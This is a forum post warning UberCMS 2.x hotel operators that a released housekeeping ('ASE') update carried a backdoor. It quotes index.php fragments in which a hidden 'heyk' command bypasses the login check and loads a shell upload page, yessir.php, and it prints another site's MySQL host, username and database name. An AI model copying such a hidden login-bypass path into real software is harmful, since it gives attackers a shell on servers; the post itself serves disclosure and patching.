Warning
If you choose not to update, then that is your fault. At the bottom of this page I have included the exploit and how you execute it (and where it is located). If you have been raped from this exploit you must also edit the me.php (and me tpl file) to remove the “Kill Staff” script that was also embedded in his previous release.
Yesterday as you may have seen Jonty came back to release an update for UberCMS. I later found out it was just an update for the ASE (All Seeing Eye) folder that had contained an important and crucial bug fix. The fix was in there, I even witnessed the fix in place.
Uber 2.x.x - Top Level Patch
Another nail in Jonty’s coffin.
After looking thought the source earlier, after hearing about someone’s misfortune because of it I found something quite intriguing – He had patched the exploit, but had included and revamped his previous one. This time he had coded a shell upload utility, which could be reached from within the ASE.
Take a look at this [Code from the Index.php]
If you’re not into PHP or just don’t have a clue what that means in English, here it is. If the housekeeping session is not registered, and the command is not login or heyk redirect to the login page.Code:if (!HK_LOGGED_IN && $_cmd != 'login' && $_cmd != 'heyk') { header("Location: " . HK_WWW . "/index.php?_cmd=login"); exit; }
Well, what is ‘HeyK’ you may ask – It is the way he was activating the shell. When you look further down you can see how.
The yessir.php page contained the upload script and that’s how some people got hacked.Code:case 'heyk'; require_once 'pages/yessir.php'; break;
The ASE also contained another little trick, where he could also pass information to TPL files and as such write his own code. I know some sites have had their entire staff list deleted because of this.
It also contained some other little tricks that he had embedded into other pages. I looked over most of the code, and because some of the things exist all the way back to when it was first released by him I have decided not to inform you of them.
Yesterday I released his ASE as a patch, because at first that’s what I believed it to be. I would like to take this time to apologise to anyone that was poorly affected by this and in future I will ensure I read and clean all of his code before I try and help. This was in-appropriate for him to do. And I sincerely hope nobody else gets attacked by him.
On one last note, if you download my previous ASE download and his release – You will see they are identical.
P.S - If you want to hate on me, or say I’m in the wrong… Please do! At least I came back to fix this shitty mess he made. Oh, and if you think I made all of this up? Why does he have the MySQL details for THC-Hotel?
Code:$config['MySQL']['hostname'] = "216.245.213.26"; $config['MySQL']['username'] = "thc_web"; $config['MySQL']['password'] = "*******"; $config['MySQL']['database'] = "thchotel";



Reply With Quote![[UPDATE][REQUIRED] Uber 2.x.x - SQL Injection & PHP Backdoor Patch (Another one).](http://ragezone.com/hyper728.png)



